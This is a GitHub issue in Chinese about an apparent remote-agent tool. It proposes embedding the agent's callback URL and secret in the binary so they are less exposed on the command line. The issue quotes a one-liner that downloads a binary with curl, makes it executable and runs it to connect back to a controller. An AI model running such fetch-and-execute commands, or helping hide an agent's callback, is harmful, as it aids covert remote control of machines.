Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

建议将探针(Agent)所需参数写入程序自身而不是通过命令行传输 #6

Open
badboycxcc opened this issue Apr 16, 2024 · 1 comment

Comments

@badboycxcc
Copy link

以Linux 探针为例

curl -skO http://127.0.0.1:88/d/9nr8y4rd && chmod +x 9nr8y4rd && ./9nr8y4rd agent -u http://127.0.0.1:88 -s u0oiesko

里面的-u 指定的回连的地址,增加暴露的风险。特殊情况下(不能带参数执行)会造成一定使用困难。

@1c3z
Copy link
Collaborator

1c3z commented Apr 17, 2024

go程序将自定义的配置文件写入自身这块我也不太熟呀。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants